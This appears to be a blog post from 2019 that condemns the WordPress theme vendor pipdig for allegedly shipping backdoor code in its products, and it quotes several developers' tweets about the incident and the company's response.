If you develop themes, plugins, websites for paying customers there is obviously a strong notion that you don’t have malicious intent, that your code does what it’s described as doing and only that.
However pipdig sees it another way from packaging code to: change passwords on their clients websites, performing a DDoS attacks on a competitor, delete your database and changing words/links to benefit their SEO and sales. source 1, source 2
It’s a sin and a bad one.
Essentially pipdig used the trust of their customers to build in back doors and do things they shouldnt nor be known doing. You can’t defend that and any excuse will be seen through.
i'm a php/wordpress dev, and what pipdig did is dark! they broke all ethical rules, and for me there's no diference between pipdig and black hat hackers. an honest company does not hack clients sites to attack competition… an honest company improves their products to be better.
— Isaque Fernandes (@sp1ke77) March 29, 2019
Pipdig were quick to release a “patch” when notified of the nasty code which obviously removed all the nasty bits of code.
Well, pipdig's cron.php has a lot of changes between versions 4.7.7 and 4.8.0 – tweeting this because people apparently believe screenshots more than multiple developers long and detailed explanations. pic.twitter.com/Ph2KwFBXv0
— Zoe C (Mama Geek) (@zoecorkhill) March 30, 2019
The tweet that perfectly sums up the aftermath is this from @heyitsmikeyv
There are two camps on this @pipdig thing right now.
On one hand, you've got a bunch of Pipdig users going "I don't know much about code but I trust them"
On the other, there's literally everyone aware of it who can read PHP and we're ripping our freaking eyebrows out.
— Mikey Veenstra (@heyitsmikeyv) March 29, 2019
pipdig really took advantage of their customers, the evidence in the malicious code is there for all to see. Some can understand it others just see it as code. Packaged code does not lie.
Poor damage control
The pipdig response post glosses over the fact they were caught out, they try to spin it for something that the non technical, dev people who are their clients would believe. Despite the hard evidence in the code being very prevalent.
There genuinely seems to be a lot of delusion and mistrust for pipdig
Thats why the tweet above hits the spot. People who know PHP say its bad…..its bad. Dont trust the people who put a backdoor into the code you buy.
Sometimes when there is hard facts, evidence and those in the know stating your actions were dodgy and malicious you best not to further spin out of it with misinformation.